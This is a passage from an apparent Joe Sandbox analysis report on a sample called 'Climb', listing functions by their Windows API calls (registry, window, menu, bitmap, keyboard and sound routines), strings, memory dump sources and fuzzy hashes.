                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001490CD
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001490F5
                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0014910B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                          • Opcode ID: 2708cce3a57e950a622702b2798522aae9bcdfa3b47ea936e62b39c8222ba1e3
                                                                                                                                                                          • Instruction ID: c2c50b6d9e6b3e1de2e165deb09947089bcea871bc3bd6dd98f9e51790db526e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2708cce3a57e950a622702b2798522aae9bcdfa3b47ea936e62b39c8222ba1e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 74411879600208BFDB219F65EC89EAB7BBCFF8AB21F104058F905D7660D7719981DB20
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
                                                                                                                                                                            • Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C154
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C1D2
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0013C26A
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0013C2DE
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0013C2FC
                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0013C352
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0013C364
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0013C382
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0013C3E3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013C3F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                          • Opcode ID: ac23d675358825987fbbb7cf24d940b47e0b9998cadfca8e6fb22f4eda7c7044
                                                                                                                                                                          • Instruction ID: 7d6d3d68a2ba6c2750850e345394da84d7a08919aff19209a8f12343b6868b94
                                                                                                                                                                          • Opcode Fuzzy Hash: ac23d675358825987fbbb7cf24d940b47e0b9998cadfca8e6fb22f4eda7c7044
                                                                                                                                                                          • Instruction Fuzzy Hash: 45C18A35204201AFD714DF24C494FAABBE1BF84308F14849CF4AA9B6A2CB75ED46CBD1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00133035
                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00133045
                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00133051
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0013305E
                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001330CA
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00133109
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0013312D
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00133135
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0013313E
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00133145
                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00133150
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                          • Opcode ID: 31cf4375d926922a5247f75c679f0cf184b33747c97eeba421b30e3ecfc49fb0
                                                                                                                                                                          • Instruction ID: 00679b561f61bfe26bbfb1660bb8b4da99a9d2338fd0509fea069ab8cffa39b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 31cf4375d926922a5247f75c679f0cf184b33747c97eeba421b30e3ecfc49fb0
                                                                                                                                                                          • Instruction Fuzzy Hash: B861E2B5D00219EFCF14CFA4D884EAEBBB5FF48710F208529E959A7250D771AA41CFA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0014A990
                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 0014A9A7
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0014A9B3
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0014A9C9
                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0014AC15
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0014AC33
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0014AC54
                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 0014AC73
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0014AC95
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 0014ACBB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 3962739598-2766056989
                                                                                                                                                                          • Opcode ID: 3331309c6dae1c37a1836873a21574c1fa719862681e54252bce641f2a58e961
                                                                                                                                                                          • Instruction ID: f71f17aaa360cd7860ccf7f9c1e02f2feed95412a90521c8c2aa3238372a020d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3331309c6dae1c37a1836873a21574c1fa719862681e54252bce641f2a58e961
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CB18774640219EFDF14CF68C9C47AE7BB2FF44705F5A8069EC48AB2A5D770AA80CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 001152E6
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00115328
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00115339
                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00115345
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0011537A
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 001153B2
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 001153EB
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00115445
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00115477
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001154EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                          • Opcode ID: 4db185af13ee8721e8f9ec789e4ff78a500619f6e900ef860cf610311368eea7
                                                                                                                                                                          • Instruction ID: bc08b02c9d2cbc0694755546c4c9bbf23ff68e8c70f29906c20a49ef773d638f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4db185af13ee8721e8f9ec789e4ff78a500619f6e900ef860cf610311368eea7
                                                                                                                                                                          • Instruction Fuzzy Hash: 5991C471104B06EFDB0CCF24D895AE9B7AAFF81304F004529FA9682591EB31ED95CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001497B6
                                                                                                                                                                          • GetFocus.USER32 ref: 001497C6
                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 001497D1
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00149879
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0014992B
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00149948
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00149958
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0014998A
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001499CC
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001499FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1026556194-4108050209
                                                                                                                                                                          • Opcode ID: d0f06ddf8a0e4c2bf93f79dd528c2f88f2b0853cbad2a09d18bf3a0b397e1c9d
                                                                                                                                                                          • Instruction ID: 8c0bf60adf10c44722850002bfaddb089de51729d39d19c30293e8d09163bde7
                                                                                                                                                                          • Opcode Fuzzy Hash: d0f06ddf8a0e4c2bf93f79dd528c2f88f2b0853cbad2a09d18bf3a0b397e1c9d
                                                                                                                                                                          • Instruction Fuzzy Hash: E881E271504306AFDB10CF28DC84AAB7BE8FF89358F10491DF985972A1DB30D945CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(001829C0,000000FF,00000000,00000030), ref: 0011C973
                                                                                                                                                                          • SetMenuItemInfoW.USER32(001829C0,00000004,00000000,00000030), ref: 0011C9A8
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0011C9BA
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 0011CA00
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0011CA1D
                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 0011CA49
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0011CA90
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0011CAD6
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011CAEB
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011CB0C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                          • Opcode ID: 894b89490ba5b012ead36279337e2d96e3fc35249b73a9231505c714e22a1e6c
                                                                                                                                                                          • Instruction ID: 308a3d36269b831b32d219325bc0b000e66cf955129ad820e272d3d31387657d
                                                                                                                                                                          • Opcode Fuzzy Hash: 894b89490ba5b012ead36279337e2d96e3fc35249b73a9231505c714e22a1e6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A619170A40249AFDF1ACF64E889AFE7BB9FF05348F044065E911E7251DB35AD81CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0011E4D4
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0011E4FA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011E504
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0011E554
                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0011E570
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                          • Opcode ID: a7cc4a23399479a5f7cd0fb70efe8d8a11ff5694c3ecc91a2e69a3fc3e3c9c7a
                                                                                                                                                                          • Instruction ID: e3721bd068a323760b88943c6841efab838d5365989dce0646c6be904ccb6ba1
                                                                                                                                                                          • Opcode Fuzzy Hash: a7cc4a23399479a5f7cd0fb70efe8d8a11ff5694c3ecc91a2e69a3fc3e3c9c7a
                                                                                                                                                                          • Instruction Fuzzy Hash: AF412272A403147BEB04ABA49C47EFF37ACDF55710F00402AF904A6293EB74EA4192B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0013D6C4
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0013D6ED
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0013D7A8
                                                                                                                                                                            • Part of subcall function 0013D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0013D70A
                                                                                                                                                                            • Part of subcall function 0013D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0013D71D
                                                                                                                                                                            • Part of subcall function 0013D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0013D72F
                                                                                                                                                                            • Part of subcall function 0013D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0013D765
                                                                                                                                                                            • Part of subcall function 0013D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0013D788
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0013D753
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                          • Opcode ID: 91a5b71ac9f2e3e9c994435f0f607df47db051db1601072f8e879dff23469fa5
                                                                                                                                                                          • Instruction ID: 4b0faac8f634387d1e2b211c141ddfc1120eee9dadef6697d0640c0ed8be2229
                                                                                                                                                                          • Opcode Fuzzy Hash: 91a5b71ac9f2e3e9c994435f0f607df47db051db1601072f8e879dff23469fa5
                                                                                                                                                                          • Instruction Fuzzy Hash: 01316E75A01129BBDB219BA0FC88EFFBB7CEF56714F000165B805E3250DB349E859AA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • timeGetTime.WINMM ref: 0011EFCB
                                                                                                                                                                            • Part of subcall function 000CF215: timeGetTime.WINMM(?,?,0011EFEB), ref: 000CF219
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0011EFF8
                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0011F01C
                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0011F03E
                                                                                                                                                                          • SetActiveWindow.USER32 ref: 0011F05D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0011F06B
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0011F08A
                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 0011F095
                                                                                                                                                                          • IsWindow.USER32 ref: 0011F0A1
                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 0011F0B2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                          • Opcode ID: cb97519eefc48658228bc9f5be2a45c749469eb7c91341c544c6595f130cabee
                                                                                                                                                                          • Instruction ID: cb6a17c74349f9eedc0381ed30811d13091026c31d7f7c7bc8a88925c800be7a
                                                                                                                                                                          • Opcode Fuzzy Hash: cb97519eefc48658228bc9f5be2a45c749469eb7c91341c544c6595f130cabee
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A21CF79200205BFEB156F24FC89A667BABF74AB45B140038F80582A72DB718FC18B11
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0011F374
                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0011F38A
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011F39B
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0011F3AD
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0011F3BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                          • Opcode ID: e47a5cf960a5ac2650ac8d39b408dddf618ad904247fb3d660163f50f642ab55
                                                                                                                                                                          • Instruction ID: e488239c134c21f0c9e15ebcd6396e589c34138446ee16f497aa59daeea6581b
                                                                                                                                                                          • Opcode Fuzzy Hash: e47a5cf960a5ac2650ac8d39b408dddf618ad904247fb3d660163f50f642ab55
                                                                                                                                                                          • Instruction Fuzzy Hash: 24110231A9021D7AD724A362CC0AEFFBA7CEBC2B10F00083A7915E20D1EFA01D85C5B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0011A9D9
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0011AA44
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0011AA64
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0011AA7B
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0011AAAA
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0011AABB
